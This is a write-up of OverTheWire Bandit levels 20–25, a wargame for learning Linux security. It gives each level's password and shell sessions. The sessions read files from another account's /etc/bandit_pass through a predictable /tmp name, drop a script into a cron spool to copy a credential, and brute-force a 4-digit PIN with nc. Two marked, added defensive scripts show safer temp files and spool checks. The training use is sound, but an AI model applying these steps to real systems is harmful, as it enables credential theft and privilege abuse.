Shubham Patel

OverTheWire :- Bandit (Level 20–25) [CTF]

Level 20 → Level 21

Level Goal

There is a setuid binary in the home directory that does the following: it makes a connection to localhost on the port you specify as a command-line argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

NOTE: Try connecting to your own network daemon to see if it works as you think

$ ssh bandit20@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit20@bandit.labs.overthewire.org's password: GbKksEFF4yrVs6il55v6gwY5aVje5f0j

Solution

bandit20@bandit:~$ echo "GbKksEFF4yrVs6il55v6gwY5aVje5f0j" | nc -l localhost -p 33333 &
[1] 25823
bandit20@bandit:~$ ./suconnect 33333
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

Level 21 → Level 22

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

$ ssh bandit21@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit21@bandit.labs.overthewire.org's password:
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

Solution

bandit21@bandit:~$ cd /etc/cron.d

bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null

bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

Level 22 → Level 23

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

$ ssh bandit22@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit22@bandit.labs.overthewire.org's password:
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

Solution

bandit22@bandit:~$ cd /etc/cron.d

bandit22@bandit:/etc/cron.d$ ls -l
total 24
-rw-r--r-- 1 root root  62 May 14 13:40 cronjob_bandit15_root
-rw-r--r-- 1 root root  62 Jul 11 15:56 cronjob_bandit17_root
-rw-r--r-- 1 root root 120 May  7 20:14 cronjob_bandit22
-rw-r--r-- 1 root root 122 May  7 20:14 cronjob_bandit23
-rw-r--r-- 1 root root 120 May 14 09:41 cronjob_bandit24
-rw-r--r-- 1 root root  62 May 14 14:04 cronjob_bandit25_root

bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null

bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349

bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
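
The file name in /tmp is computed from nothing but the user name, which is why bandit22 could work it out. The script below is an added example (not part of the original post or the Bandit scripts) that puts that derivation next to a mktemp-based variant; the helper names and the scratch data are made up for the illustration.

```shell
#!/bin/bash
# Added example: predictable vs. private temp-file handling.
# All helper names are hypothetical; the secret is constructed test data.

# Same derivation as cronjob_bandit23.sh: the file name depends only on the
# user name, so anyone who can read the script can compute it for any user.
predictable_target() {
    echo I am user "$1" | md5sum | cut -d ' ' -f 1
}

# What the cron job does: write the secret under the guessable name.
# The file mode comes from the umask, which normally leaves it world-readable.
copy_predictable() {   # args: secret-file, output-dir, user-name
    local out="$2/$(predictable_target "$3")"
    cat "$1" > "$out" && echo "$out"
}

# Hardened variant: mktemp picks a random name and creates the file 0600.
copy_private() {       # args: secret-file, output-dir
    local out
    out=$(mktemp "$2/pass.XXXXXXXXXX") || return 1
    cat "$1" > "$out" && echo "$out"
}

# Files directly inside a directory that other users can read.
readable_by_others() {
    find "$1" -maxdepth 1 -type f -perm -004
}

# Demo on constructed data in a scratch directory.
demo() {
    local work secret
    work=$(mktemp -d) || return 1
    secret="$work/secret.txt"
    (umask 077; echo "constructed-secret" > "$secret")
    (umask 022; copy_predictable "$secret" "$work" bandit23) > /dev/null
    copy_private "$secret" "$work" > /dev/null
    readable_by_others "$work"    # lists only the md5-named copy
    rm -rf "$work"
}
demo
```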

Level 23 → Level 24

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

$ ssh bandit23@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit23@bandit.labs.overthewire.org's password:
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

Solution

bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

Approach

Create a directory in the /tmp/ folder. Create a shell script that copies /etc/bandit_pass/bandit24 into our /tmp/ folder. Copy the shell script to /var/spool/bandit24/. The cron job runs the script as bandit24, so give the shell script and the /tmp/ folder permissions that let bandit24 execute the script and write the output file.

bandit23@bandit:~$ mkdir /tmp/abc
bandit23@bandit:~$ cd /tmp/abc
bandit23@bandit:/tmp/abc$ cat > abc.sh
        #!/bin/bash
        cat /etc/bandit_pass/bandit24 >> /tmp/abc/pass24


bandit23@bandit:/tmp/abc$ chmod 777 /tmp/abc
bandit23@bandit:/tmp/abc$ chmod 777 abc.sh
bandit23@bandit:/tmp/abc$ cp abc.sh /var/spool/bandit24/

--------------after some time -------------------

bandit23@bandit:/tmp/abc$ cat pass24
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
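
Seen from the admin's side, the cron job above runs files that another account is allowed to drop into its spool directory. The script below is an added example (not from the original post or the Bandit server): a check a scheduled job can make before it runs anything from a drop directory. safe_to_run and run_spool are hypothetical names.

```shell
#!/bin/bash
# Added example: ownership and permission checks before a scheduled job runs
# a file from a drop directory (safe_to_run and run_spool are hypothetical).

# True only when DIR/FILE is fully controlled by the account running the job:
#   DIR  - a directory owned by this account that group and others
#          cannot write to
#   FILE - a regular file (not a symlink), owned by this account,
#          and not writable by group or others
safe_to_run() {
    local dir=$1 file=$2 uid
    uid=$(id -u)
    [ -n "$(find "$dir" -maxdepth 0 -type d -user "$uid" \
            ! \( -perm -020 -o -perm -002 \) 2>/dev/null)" ] || return 1
    [ -n "$(find "$dir/$file" -maxdepth 0 -type f -user "$uid" \
            ! \( -perm -020 -o -perm -002 \) 2>/dev/null)" ] || return 1
}

# Runner loop in the shape of cronjob_bandit24.sh, but it skips anything that
# fails the check and leaves it in place for review instead of deleting it.
# Prints the name of every file it decided to run.
run_spool() {
    local dir=$1 path name
    for path in "$dir"/* "$dir"/.[!.]*; do
        # Unmatched glob patterns stay literal; skip them.
        [ -e "$path" ] || [ -L "$path" ] || continue
        name=${path##*/}
        if safe_to_run "$dir" "$name"; then
            echo "$name"
            timeout -s 9 60 "$path" > /dev/null 2>&1
        fi
    done
}
```

With these checks a spool directory set to mode 777, like /tmp/abc above, fails the first test and nothing in it is executed.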

Level 24 → Level 25

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

$ ssh bandit24@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit24@bandit.labs.overthewire.org's password:
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Solution

bandit24@bandit:~$ mkdir /tmp/aaaa
bandit24@bandit:~$ cd /tmp/aaaa
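bandit24@bandit:/tmp/aaaa$ cat > abc.sh
    #!/bin/bash
    # Write one "<bandit24 password> <pin>" line per candidate pincode.
    # {0000..9999} keeps the leading zeros, covering all 10000 4-digit values.
    for i in {0000..9999}
    do
        echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i"
    done > ./out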

bandit24@bandit:/tmp/aaaa$ chmod +x abc.sh
bandit24@bandit:/tmp/aaaa$ ./abc.sh
bandit24@bandit:/tmp/aaaa$ cat out | nc localhost 30002

-----------You will get password-----------
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

THANKS FOR READING ...!!
